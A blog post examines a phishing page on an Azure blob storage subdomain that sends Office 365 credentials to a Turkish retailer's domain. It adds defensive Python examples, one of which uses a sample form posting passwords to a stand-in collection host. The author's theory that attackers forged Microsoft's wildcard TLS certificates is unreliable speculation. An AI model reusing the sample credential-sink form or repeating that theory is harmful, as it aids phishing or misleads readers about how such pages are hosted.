A lot of interesting finds can be discovered on Twitter. A security researcher found a webpage on Microsoft.net for Office 365 that uses a TLS certificate which appears to be very suspicious.
What’s that *.blob.core.windows.net subdomain?
JavaScript code related to the page sends a user’s sensitive authentication credentials to kopcamveanya.com.
I decided to take the plunge and see what the website hosted at kopcamveanya.com was all about. It appeared to be a Turkish retailer of some sort.
I plugged their “About” page into Google Translate, as I don’t understand Turkish.
I can only speculate as to what’s going on with Microsoft’s domain and the domain of this Turkish glass retailer. But most likely Microsoft is being impersonated by cyber attackers. Microsoft is one of the biggest tech companies in the world. Even if you prefer to use Macs or Linux, I can pretty much guarantee that you’ve directly used their software at some point. We also use their software indirectly through platforms like Microsoft IIS web servers, Windows Server operating systems, and Microsoft Azure cloud servers. They may have started on the client frontend in the 80s with MS-DOS and Windows, but for decades they have had a significant presence on the backend too. Their 2018 revenue was about $110.36 billion USD, and they employ many of the top minds in the computing industry. I’m confident that they wouldn’t knowingly collaborate with cyber attackers, and I would expect them to secure their TLS certificates and all of their public key infrastructure like Fort Knox.
But the only reasonable assumption here is that cyber attackers have indeed impersonated their TLS systems and domain. And the *.blob.core.windows.net subdomain may be one that cyber attackers have created themselves. They may have been able to maliciously acquire some windows.net TLS certificates to modify for their own nefarious purposes. But more likely, they were able to generate TLS certificates for *.blob.core.windows.net completely on their own.
The JavaScript on what’s likely the cyber attackers’ phishing webpage for credential collection isn’t obfuscated at all: we can clearly see that passwords submitted through that form are being sent to an address on the kopcamveanya.com domain.
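The behaviour described above (a login form on one host submitting the password to a different host) is something a defender can check for mechanically. The following is an added example, not code from the original post: it parses a page’s HTML with the standard library, finds every form that contains a password field, resolves the form’s action against the page URL, and flags the form when the action’s host differs from the page’s host. The sample page and both hostnames in it are constructed for the example.

```python
"""Flag login forms whose password field is submitted to a host other than
the page's own origin. Added example; the sample page below is constructed."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect each <form> with its action and the (name, type) of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []       # list of {"action": str, "fields": [(name, type), ...]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(
                (a.get("name") or "", (a.get("type") or "text").lower())
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_offsite_credential_forms(html, page_url):
    """Return [(action_host, [field names])] for every form that has a
    password input and posts to a host other than the host of page_url.
    Relative actions resolve to the page host and are therefore not flagged."""
    page_host = urlsplit(page_url).hostname
    scanner = _FormScanner()
    scanner.feed(html)
    hits = []
    for form in scanner.forms:
        if "password" not in {t for _, t in form["fields"]}:
            continue                      # not a credential form
        action_host = urlsplit(urljoin(page_url, form["action"])).hostname
        if action_host != page_host:
            hits.append((action_host, [n for n, _ in form["fields"]]))
    return hits


# Constructed sample: a page on a hypothetical storage subdomain with two forms.
# Only the first form is a credential form posting off-site; the second posts
# to the page's own host and the third has no password field.
SAMPLE_PAGE_URL = "https://phishing.blob.core.windows.net/site/index.html"
SAMPLE_HTML = """
<html><body>
  <form action="https://credential-sink.example/collect.php" method="post">
    <input name="login" type="email"><input name="passwd" type="password">
  </form>
  <form action="/legit-login" method="post">
    <input name="user"><input name="pass" type="password">
  </form>
  <form action="https://newsletter.example/subscribe"><input name="email"></form>
</body></html>
"""

if __name__ == "__main__":
    for host, fields in find_offsite_credential_forms(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(f"password field submitted off-site to {host}: fields={fields}")
```

This only catches static `<form action>` targets; a page that collects the fields with script and sends them with `fetch` or `XMLHttpRequest` needs the outbound request hosts checked instead (for example from browser network logs or a proxy), which is the same host-comparison rule applied to request URLs rather than form actions.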
Is the Turkish ecommerce site for glass retailing a front for cyber crime? Why is an online store being delivered through plaintext HTTP? I’m not going to try to buy something to see if customer transaction data is sent through HTTPS. Perhaps it isn’t. Perhaps it is. It’s not worth the risk for me.
I think the more probable scenario is that the Turkish glass retailer’s site isn’t a front for cyber crime; the cyber attackers may have hijacked the kopcamveanya.com domain to route their data transmissions. I mean, come on! A web store that uses HTTP?
Hopefully someone has reported this phishing incident to Microsoft.
The *.blob.core.windows.net subdomain in the cyber attackers’ TLS certificate marks it as a wildcard certificate. Any label can be used in the first part of the subdomain, because * is a wildcard. It could be phishing.blob.core.windows.net, it could be fraud.blob.core.windows.net, it could be fooledya.blob.core.windows.net, it could be whatever you want.
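To make the wildcard rule concrete, here is an added example (not code from the original post) implementing the RFC 6125 style of certificate name matching that browsers apply: the `*` is honoured only when it is the entire left-most label, and it stands for exactly one label. So `*.blob.core.windows.net` covers any single host name placed directly under that zone, but not the bare zone name and not a name two labels deep. The `san_covers` helper then answers the question a defender asks when reviewing a certificate: which entry in its subject alternative names, if any, covers a host name seen in traffic.

```python
"""RFC 6125-style matching of certificate DNS names against host names.
Added example; it uses only the standard library."""


def cert_name_matches(pattern, hostname):
    """True if the certificate DNS name `pattern` covers `hostname`.
    Rules applied (as browsers do):
      * comparison is case-insensitive and ignores a trailing dot;
      * a '*' is accepted only as the whole left-most label;
      * the wildcard matches exactly one label, never zero or several;
      * wildcards with fewer than two fixed labels ('*.com') are refused."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or "*" in pattern[1:]:
        return False                      # partial or non-leading wildcard
    if len(p_labels) < 3:
        return False                      # too broad to be a sane wildcard
    if any(label == "" for label in h_labels):
        return False                      # empty label, not a valid host name
    return len(h_labels) == len(p_labels) and h_labels[1:] == p_labels[1:]


def san_covers(san_dns_names, hostname):
    """Return the first SAN entry that covers `hostname`, or None."""
    for name in san_dns_names:
        if cert_name_matches(name, hostname):
            return name
    return None


if __name__ == "__main__":
    # Constructed SAN list modelled on the wildcard name discussed in the post.
    sans = ["*.blob.core.windows.net", "blob.core.windows.net"]
    for host in ["phishing.blob.core.windows.net", "fooledya.blob.core.windows.net",
                 "blob.core.windows.net", "a.b.blob.core.windows.net",
                 "blob.core.windows.net.example"]:
        print(f"{host:40} covered by: {san_covers(sans, host)}")
```

The output makes the point of the paragraph visible: every first-level label under the zone is covered by the single wildcard entry, while names outside that one-label slot are not, so the blast radius of a leaked wildcard key is exactly the set of hosts one label below the zone.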
Last October, David Bisson recommended that organizations cease using wildcard certificates. He wrote:
“Clearly, attackers are comfortable with using wildcard certificates for phishing email attacks and other attacks. Fortunately, security controls and solutions can help block an attack. By putting these defenses in place, you increase the effort that a malicious actor must take to compromise your network. Your goal is to make compromising your network so expensive that cyber-criminals would rather focus their attention on someone else. As the saying goes: When a lion chases you, you don’t need to be the fastest runner; you just have to be faster than the person behind you.
You can make your organization more costly to exploit by avoiding wildcard certificates. Although wildcard certificates make business operations simpler, they provide tremendous opportunity to any cyber-criminal who compromises your webserver or steals a wildcard certificate’s private key.”
Maybe Microsoft got into the habit of using wildcard certificates and thereby opened an opportunity for cyber attackers who want to spoof their web apps and websites. As for the kopcamveanya.com website, there’s nothing about it that looks at all secure.